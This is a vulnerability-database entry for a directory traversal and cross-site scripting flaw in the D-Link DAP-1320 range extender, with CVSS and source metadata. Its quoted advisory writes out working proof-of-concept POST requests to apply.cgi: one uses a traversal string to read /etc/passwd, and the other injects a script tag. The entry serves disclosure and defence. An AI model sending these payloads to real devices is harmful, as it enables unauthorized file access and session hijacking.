VAR-201405-0650
Vulnerability from variot - Updated: 2022-05-17 02:09The D-Link DAP-1320 is a router device. D-Link DAP-1320 'html_response_message' has a cross-site scripting vulnerability. The GET parameter passed to the apply.cgi via the \"html_response_page\" GET parameter is missing filtering before returning to the user, allowing remote attackers to exploit the vulnerability to construct a malicious URI to entice the user. Parsing, get sensitive cookies, hijack sessions or perform malicious actions on the client. D-Link's DAP-1320 Wireless Range Extender suffers from both a directory traversal and a XSS vulnerability on all firmware versions. (current v. 1.20B07)
Directory Traversal CWE-22: Path Traversal
The POST param 'html_response_page' of apply.cgi suffers from a directory traversal vulnerability.
The following example will display the contents of /etc/passwd:
http:///apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded
POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D HTTP/1.1
XSS CWE-79: Cross Site Scripting
The POST param 'html_response_page' of apply.cgi suffers from a XSS vulnerability.
Example:
http:///apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded
POST html_response_page=%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3E&login_name=Huggy&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=pop&tmp_log_pass_auth=goes&graph_code=joffrey&session_id=57687&gcode_base64=ZZTOPI%3D HTTP/1.1
Vendor Link: http://support.dlink.com/ProductInfo.aspx?m=DAP-1320
Research Contact: K Lovett
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201405-0650",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1320",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kyle Lovett",
"sources": [
{
"db": "PACKETSTORM",
"id": "126219"
}
],
"trust": 0.1
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-02961",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2014-02961",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The D-Link DAP-1320 is a router device. D-Link DAP-1320 \u0027html_response_message\u0027 has a cross-site scripting vulnerability. The GET parameter passed to the apply.cgi via the \\\"html_response_page\\\" GET parameter is missing filtering before returning to the user, allowing remote attackers to exploit the vulnerability to construct a malicious URI to entice the user. Parsing, get sensitive cookies, hijack sessions or perform malicious actions on the client. D-Link\u0027s DAP-1320 Wireless Range Extender suffers from both a\ndirectory traversal and a XSS vulnerability on all firmware versions. \n(current v. 1.20B07)\n\n---------------------------------------------------------------------------------------------------------------------\nDirectory Traversal\nCWE-22: Path Traversal\n\nThe POST param \u0027html_response_page\u0027 of apply.cgi suffers from a\ndirectory traversal vulnerability. \n\nThe following example will display the contents of /etc/passwd:\n\nhttp://\u003cIP\u003e/apply.cgi\nPragma: no-cache\nCache-control: no-cache\nContent-Type: application/x-www-form-urlencoded\n\nPOST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\u0026login_name=\u0026html_response_message=just_login\u0026log_pass=\u0026login_n=admin\u0026action=do_graph_auth\u0026tmp_log_pass=PAN\u0026tmp_log_pass_auth=FRIED\u0026graph_code=0DEY\u0026session_id=57687\u0026gcode_base64=8TEHPOO%3D\nHTTP/1.1\n\n---------------------------------------------------------------------------------------------------------------------\nXSS\nCWE-79: Cross Site Scripting\n\nThe POST param \u0027html_response_page\u0027 of apply.cgi suffers from a XSS\nvulnerability. \n\nExample:\n\nhttp://\u003cIP\u003e/apply.cgi\nPragma: no-cache\nCache-control: no-cache\nContent-Type: application/x-www-form-urlencoded\n\nPOST\nhtml_response_page=%3Cscript%3Ealert%28\"SquirrelLord\"%29%3B%3C%2Fscript%3E\u0026login_name=Huggy\u0026html_response_message=just_login\u0026log_pass=\u0026login_n=admin\u0026action=do_graph_auth\u0026tmp_log_pass=pop\u0026tmp_log_pass_auth=goes\u0026graph_code=joffrey\u0026session_id=57687\u0026gcode_base64=ZZTOPI%3D\n HTTP/1.1\n\n---------------------------------------------------------------------------------------------------------------------\n\nVendor Link:\nhttp://support.dlink.com/ProductInfo.aspx?m=DAP-1320\n\nResearch Contact: K Lovett\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
},
{
"db": "PACKETSTORM",
"id": "126219"
}
],
"trust": 0.63
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "126219",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-02961",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
},
{
"db": "PACKETSTORM",
"id": "126219"
}
]
},
"id": "VAR-201405-0650",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
}
],
"trust": 1.35
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
}
]
},
"last_update_date": "2022-05-17T02:09:49.705000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link DAP-1320 \u0027html_response_message\u0027 patch for cross-site scripting vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/45533"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/126219/d-link-dap-1320-directory-traver"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/apply.cgi"
},
{
"trust": 0.1,
"url": "http://support.dlink.com/productinfo.aspx?m=dap-1320"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
},
{
"db": "PACKETSTORM",
"id": "126219"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
},
{
"db": "PACKETSTORM",
"id": "126219"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-02961"
},
{
"date": "2014-04-17T22:23:03",
"db": "PACKETSTORM",
"id": "126219"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-02961"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1320 \u0027html_response_message\u0027 Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-02961"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss, file inclusion",
"sources": [
{
"db": "PACKETSTORM",
"id": "126219"
}
],
"trust": 0.1
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…